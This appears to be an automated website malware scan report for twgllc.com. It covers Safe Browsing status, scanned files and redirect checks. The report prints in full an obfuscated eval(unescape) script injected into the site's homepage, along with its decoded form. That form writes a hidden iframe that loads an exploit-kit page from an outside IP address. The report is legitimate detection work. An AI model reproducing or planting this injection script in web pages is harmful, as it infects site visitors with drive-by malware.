Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=twgllc.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://twgllc.com/ | 200 OK Content-Length: 1251 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%30%33%36%63%62%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%35%38%2e%36%35%2e%32%33%32%2e%33%33%2f%67%70%61%63%6b%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%35%34%33%34%39%29%2b%27%65%66%30%30%35%36%5c%27%20%77%69%64%74%68%3d%31%33%39%20%68%65%69%67%68%74%3d%33%39%31%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29"));
Decoded script:
window.status='Done';document.write('<iframe name=036cb1 src=\'http://58.65.232.33/gpack/index.php?'+Math.round(Math.random()*54349)+'ef0056\' width=139 height=391 style=\'display: none\'></iframe>')
<iframe name=036cb1 src='http://58.65.232.33/gpack/index.php?20016ef0056' width=139 height=391 style='display: none'></iframe>
Antivirus reports:
http://twgllc.com/test404page.js | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
http://twgllc.com//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js/ | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: twgllc.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Thu, 02 Oct 2014 15:30:29 GMT
Accept-Ranges: bytes
Age: 1596
ETag: "4e3-4515126bd8cc0"
Server: Apache/2
Content-Length: 1251
Content-Type: text/html
Expires: Thu, 02 Oct 2014 16:03:54 GMT
Last-Modified: Sun, 06 Jul 2008 01:48:11 GMT
...1251 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: twgllc.com
Referer: http://www.google.com/search?q=twgllc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.